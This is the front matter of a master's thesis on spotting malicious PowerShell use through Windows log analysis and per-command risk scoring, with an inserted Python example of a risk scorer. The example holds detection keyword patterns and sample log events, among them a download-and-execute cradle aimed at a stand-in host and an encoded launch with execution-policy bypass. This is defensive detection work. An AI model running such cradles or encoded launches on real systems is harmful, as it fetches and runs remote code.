Monitoring malicious PowerShell usage through log analysis

Jesper Magnusson

Computer Science and Engineering, master's level 2019

Luleå University of Technology, Department of Computer Science, Electrical and Space Engineering


Abstract

Security has become a hot topic around the world, but attention is focused more on the perimeter than on the inside of networks, which opens up vulnerabilities. Directed cyber-attacks against the energy sector that exploit this fact have increased and can have disastrous effects, even at national level. To counter this, a solution was implemented to monitor the usage of the most powerful and popular built-in tool among attackers: PowerShell. A test-bed was set up reflecting a corporate network with two separate Active Directory domains, one for office clients and one for critical infrastructure. It was shown that attackers only needed to take over the office Active Directory domain in order to gain easy access to the critical Active Directory domain. To simulate attacks of this type, a collection of malicious scripts was gathered, from which a number of possible scenarios for taking over the office Active Directory domain via PowerShell were created. Windows has several options for logging the execution of PowerShell commands on machines. The one used, and deemed most beneficial, was "Module logging", supplemented with a filtered subset of the process creation logs. To monitor the logs created on the office client by PowerShell executions, a system based on the "ELK stack" was set up. This system gathered, processed, stored and visualized the logs along with the results of their analysis. The logs were analyzed with the aid of a custom software called "ESPSA", which, based on different parameters and contexts, assigned every execution a risk value indicating its level of maliciousness. To be able to assign risk values, the maliciousness of every command had to be evaluated. This was done with the aid of a mathematical expression that yields values between 0 and 100 based on the probability of benign execution and the security risk of the actual command.

The evaluation shows that all simulated attack scenarios were detected as malicious, reaching total risk values above the threshold of 100 in their exact implementation. It also shows that possible branches of these attacks could instead yield a value below the threshold and go undetected. The evaluation also shows that "Module logging" is unable to capture certain types of executions, primarily .NET Framework interactions, which severely limits the possibilities for monitoring malicious behavior.
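The scoring approach summarised in the abstract, reduced to a small worked example. This is added illustration code, not the thesis's ESPSA (which is written in C# and fed from Logstash). Everything specific in it is assumed: the per-cmdlet and keyword risk values stand in for the thesis's Table 3, the four event records are constructed, and working hours are modelled as a step function rather than the Akima cubic spline the thesis uses for its time factor. Event IDs 4103 (module logging, Microsoft-Windows-PowerShell/Operational) and 4688 (process creation, Security log) are the real ones.

```python
"""Toy risk scorer illustrating the ESPSA idea from the abstract: each logged
PowerShell execution gets a risk value, values accumulate per user, and the
user is flagged once the total exceeds the threshold of 100.

Everything marked "assumed" or "constructed" below is illustration, not the
thesis's data: the risk tables, the sample events, and the step-shaped time
factor (the thesis smooths working hours with an Akima cubic spline instead).
"""
import re
from collections import defaultdict
from datetime import datetime

THRESHOLD = 100  # detection threshold stated in the abstract

# Assumed risk per cmdlet named in a CommandInvocation() record (Event ID 4103).
# The thesis's Table 3 holds the real assignments; it is not on this page.
COMMAND_RISK = {
    "get-childitem": 5,
    "copy-item": 10,
    "invoke-webrequest": 30,
    "invoke-expression": 40,
    "set-mppreference": 60,
    "invoke-mimikatz": 100,
}

# Assumed risk for patterns in bound parameter values (4103) or in the
# command line of a PowerShell process creation record (Event ID 4688).
KEYWORD_RISK = {
    r"-enc\w*": 40,                   # -EncodedCommand and its short forms
    r"frombase64string": 30,
    r"downloadstring": 50,
    r"-executionpolicy\s+bypass": 20,
}

CMD_RE = re.compile(r"CommandInvocation\(([^)]+)\)")
PARAM_RE = re.compile(r'value="([^"]*)"')
PROC_RE = re.compile(r"New Process Name:\s*(.*)")
CMDLINE_RE = re.compile(r"Process Command Line:\s*(.*)")


def time_factor(timestamp):
    """Assumed step function: 1.0 inside 08-17 working hours, 1.5 outside."""
    hour = datetime.fromisoformat(timestamp).hour
    return 1.0 if 8 <= hour < 17 else 1.5


def score_event(event):
    """Return (risk, reasons) for one event, before the time factor."""
    text = event["msg"]
    risk, reasons = 0, []
    if event["id"] == 4103:                      # module logging record
        for cmd in CMD_RE.findall(text):
            r = COMMAND_RISK.get(cmd.lower(), 0)
            if r:
                risk += r
                reasons.append(cmd)
        haystack = " ".join(PARAM_RE.findall(text)).lower()
    elif event["id"] == 4688:                    # process creation record
        proc = PROC_RE.search(text)
        if not proc or "powershell" not in proc.group(1).lower():
            return 0, []                         # "filtered": keep PowerShell only
        line = CMDLINE_RE.search(text)
        haystack = (line.group(1) if line else "").lower()
    else:
        return 0, []
    for pattern, r in KEYWORD_RISK.items():
        if re.search(pattern, haystack):
            risk += r
            reasons.append(pattern)
    return risk, reasons


def score_sessions(events):
    """Accumulate time-weighted risk per user."""
    totals = defaultdict(float)
    for ev in events:
        base, _ = score_event(ev)
        totals[ev["user"]] += base * time_factor(ev["time"])
    return dict(totals)


def flagged(events):
    """Users whose accumulated risk is above THRESHOLD."""
    return sorted(u for u, t in score_sessions(events).items() if t > THRESHOLD)


# Constructed sample events, not real log data.
EVENTS = [
    {"id": 4103, "user": "CORP\\alice", "time": "2019-03-12T09:15:00",
     "msg": 'CommandInvocation(Get-ChildItem): "Get-ChildItem"\n'
            'ParameterBinding(Get-ChildItem): name="Path"; value="C:\\Users\\alice"'},
    {"id": 4103, "user": "CORP\\alice", "time": "2019-03-12T09:16:00",
     "msg": 'CommandInvocation(Copy-Item): "Copy-Item"\n'
            'ParameterBinding(Copy-Item): name="Destination"; value="D:\\backup"'},
    # Off-hours download cradle: cmdlet risk plus keyword risk, times 1.5.
    {"id": 4103, "user": "CORP\\bob", "time": "2019-03-12T23:40:00",
     "msg": 'CommandInvocation(Invoke-Expression): "Invoke-Expression"\n'
            'ParameterBinding(Invoke-Expression): name="Command"; '
            'value="(New-Object Net.WebClient).DownloadString(\'http://example.invalid/stage.ps1\')"'},
    # Encoded launch seen only in process creation: suspicious, but alone it
    # stays below the threshold (the "branching" case from the abstract).
    {"id": 4688, "user": "CORP\\carol", "time": "2019-03-12T10:05:00",
     "msg": "New Process Name: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\n"
            "Process Command Line: powershell.exe -ExecutionPolicy Bypass -EncodedCommand SQBFAFgA"},
    # Direct .NET call typed at the prompt: module logging records no
    # CommandInvocation for the method call itself, so the scorer sees nothing.
    {"id": 4103, "user": "CORP\\dave", "time": "2019-03-12T14:00:00",
     "msg": 'CommandInvocation(Out-Default): "Out-Default"'},
]

if __name__ == "__main__":
    for user, total in score_sessions(EVENTS).items():
        print(f"{user:12} {total:6.1f}")
    print("flagged:", flagged(EVENTS))
```

Only `CORP\bob` is flagged: the cradle alone scores 90 and the off-hours factor lifts it to 135. `CORP\carol` shows the branching problem from the evaluation: an encoded launch visible only through process creation stops at 60, so whether the attack is caught depends on what the decoded payload does next in the module log. `CORP\dave` shows the .NET blind spot: a `[System.Net.WebClient]` call typed directly leaves no cmdlet invocation to score. In a real deployment the event list would come from Elasticsearch or a Logstash pipeline rather than an inline list.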


List of Figures

1 Industroyer overview (p. 10)
2 Test-bed used for vulnerability evaluation (p. 15)
3 Test-bed with implemented solution (p. 24)
4 Process flow between solution components (p. 25)
5 Process flow between ESPSA components (p. 27)
6 Example graph of Akima Cubic Spline Interpolation for time risk factoring with working hours between 8 and 17 (p. 31)
7 3D plot of equation 2 (p. 42)

List of Tables

1 Malicious PowerShell scripts (p. 16)
2 Enabled GPOs for PowerShell logging (p. 23)
3 PowerShell command risk assignments (p. 32)
4 Outcome of simulation - Local files (p. 37)
5 Outcome of simulation - MSI packages (p. 38)
6 Outcome of simulation - Saved browser credentials (p. 39)

List of Listings

1 PowerShell logon script (p. 20)
2 PowerShell logoff script (p. 21)
3 Added log structure by Logstash (p. 26)

List of Equations

1 PowerShell execution risk evaluation (p. 30)
2 PowerShell command risk assignment (p. 32)


Abbreviations

AD Active Directory. 5, 7, 8, 14–16, 18–22, 36, 37, 39, 40
AD DS Active Directory Domain Services. viii, 14–16, 20–22
AI Artificial Intelligence. 49
BHIPS Behavioural Host Intrusion Prevention System. 3
BIOS Basic Input/Output System. 7, 16
C# C Sharp. 24, 27
C&C command-and-control. 5–9, 11, 12, 20
CLI Command Line Interface. 13
CMD Command Prompt. iii, 45, 48, Glossary: Command Prompt
CNN Convolutional Neural Network. 3
COM Component Object Model. 12
CPU Central Processing Unit. 8
DC Domain Controller. viii, 15, 16, 21, 40
DCOM Distributed COM. 12
DHCP Dynamic Host Configuration Protocol. 16
DLL Dynamic-Link Library. 6–8, 11, 12
DMS Distribution Management System. 9, 10
DNS Domain Name System. 17, 19
DoS Denial-of-Service. iii, 10, 12, Glossary: Denial-of-Service
FIFO First In First Out. 28
FTP File Transfer Protocol. 21
GPO Group Policy Object. ii, viii, 4, 13, 15, 16, 20, 21, 23, 25, 43–45
HMI Human-Machine Interface. 9
HTML HyperText Markup Language. 7, 19

